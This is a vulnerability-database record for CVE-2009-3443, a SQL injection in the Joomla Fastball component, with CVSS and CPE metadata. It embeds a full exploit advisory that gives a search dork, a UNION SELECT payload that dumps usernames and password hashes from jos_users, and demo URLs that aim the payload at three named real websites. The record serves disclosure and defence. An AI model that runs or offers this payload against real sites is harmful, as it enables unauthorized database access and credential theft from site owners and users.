ID CVE-2009-3443
Type cve
Reporter cve@mitre.org
Modified 2009-09-29T04:00:00
Description
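SQL injection vulnerability (CWE-89) in the Fastball (com_fastball) component 1.1.0 through 1.2 for Joomla! allows remote attackers to execute arbitrary SQL commands via the league parameter to index.php. The record's CVSS v2 vector (AV:N/AC:L/Au:N/C:P/I:P/A:P, base score 7.5) indicates the flaw is reachable over the network without authentication. The vulnerable code is in the third-party component rather than Joomla! core: the CPE configuration marks com_fastball 1.1.0 and 1.2 as vulnerable and joomla:joomla as the non-vulnerable host platform. A public exploit is referenced in the record (EDB-ID:9822).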
{"id": "CVE-2009-3443", "bulletinFamily": "NVD", "title": "CVE-2009-3443", "description": "SQL injection vulnerability in the Fastball (com_fastball) component 1.1.0 through 1.2 for Joomla! allows remote attackers to execute arbitrary SQL commands via the league parameter to index.php.", "published": "2009-09-28T22:30:00", "modified": "2009-09-29T04:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3443", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/36878", "http://packetstormsecurity.org/0909-exploits/joomlafastball-sql.txt"], "cvelist": ["CVE-2009-3443"], "type": "cve", "lastseen": "2021-02-02T05:40:05", "edition": 4, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:9822"]}], "modified": "2021-02-02T05:40:05", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-02-02T05:40:05", "rev": 2}, "vulnersScore": 7.3}, "cpe": ["cpe:/a:fastballproductions:com_fastball:1.1.0", "cpe:/a:fastballproductions:com_fastball:1.2"], "affectedSoftware": [{"cpeName": "fastballproductions:com_fastball", "name": "fastballproductions com fastball", "operator": "eq", "version": "1.2"}, {"cpeName": "fastballproductions:com_fastball", "name": "fastballproductions com fastball", "operator": "eq", "version": "1.1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:fastballproductions:com_fastball:1.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:fastballproductions:com_fastball:1.1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "scheme": null, "affectedConfiguration": [{"cpeName": "joomla:joomla", "name": "joomla", "operator": "eq", "version": "*"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:fastballproductions:com_fastball:1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:fastballproductions:com_fastball:1.1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "extraReferences": [{"name": "http://packetstormsecurity.org/0909-exploits/joomlafastball-sql.txt", "refsource": "MISC", "tags": ["Exploit"], "url": "http://packetstormsecurity.org/0909-exploits/joomlafastball-sql.txt"}, {"name": "36878", "refsource": "SECUNIA", "tags": ["Vendor Advisory"], "url": "http://secunia.com/advisories/36878"}]}
{"exploitdb": [{"lastseen": "2016-02-01T11:19:30", "description": "Joomla Fastball component 1.1.0-1.2 SQL Injection. CVE-2009-3443. Webapps exploit for php platform", "published": "2009-09-24T00:00:00", "type": "exploitdb", "title": "Joomla Fastball component 1.1.0-1.2 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3443"], "modified": "2009-09-24T00:00:00", "id": "EDB-ID:9822", "href": "https://www.exploit-db.com/exploits/9822/", "sourceData": "########################################################################################################\r\n## Joomla Component com_fastball Remote SQL injection vulnerability - (league)\t \t\t ##\r\n## Author : kaMtiEz (kamzcrew@gmail.com)\t\t\t\t\t\t\t ##\r\n## Homepage : http://www.indonesiancoder.com \t \t\t\t\t\t ##\r\n## Date : September 23, 2009 \t\t\t\t\t\t\t\t\t ##\r\n########################################################################################################\r\n# Hello My Name Is : ##\r\n# __ _____ __ ._____________ ##\r\n# | | _______ / \\_/ |_|__\\_ _____/_______ ##\r\n# | |/ /\\__ \\ / \\ / \\ __\\ || __)_\\___ / ##\r\n# | < / __ \\_/ Y \\ | | || \\/ / ##\r\n# |__|_ \\(____ /\\____|__ /__| |__/_______ /_____ \\ ##\r\n# \\/ \\/ \\/ \\/ \\/ -=- INDONESIAN CODER -=- KILL-9 CREW -=- ##\r\n########################################################################################################\r\n\r\n[ Software Information ]\r\n\r\n[+] Vendor : http://www.fastballproductions.com/\r\n[+] Download : http://www.fastballproductions.com/index.php?option=com_digistore&task=list_products&id=1&Itemid=32\r\n[+] version : 1.1.0 - 1.2\r\n[+] Vulnerability : SQL injection\r\n[+] Dork : inurl:\"com_fastball\"\r\n[+] Location : INDONESIA\r\n#############################################################################################################\r\n\r\n[ Vulnerable File ]\r\n\r\nhttp://127.0.0.1/index.php?option=com_fastball&league=[INDONESIANCODER]\r\n\r\n[ Exploit 
]\r\n\r\n-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--\r\n\r\n[ Demo ]\r\n\r\nhttp://diamondblacks.com/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--\r\n\r\nhttp://sandiegoturbos.com/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--\r\n\r\nhttp://www.unibaseball.co.uk/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--\r\n\r\n#############################################################################################################\r\n\r\n[ Thx TO ]\r\n\r\n[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW\r\n[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h\r\n[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz\r\n[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,devil_nongkrong and YOU!!\r\n\r\n[ NOTE ] \r\n\r\n[+] makasih buad babe and enyak .... muach ..\r\n[+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha\r\n[+] aurakasih napa sih lo susah banget di hubungi ?? .. hha\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9822/"}]}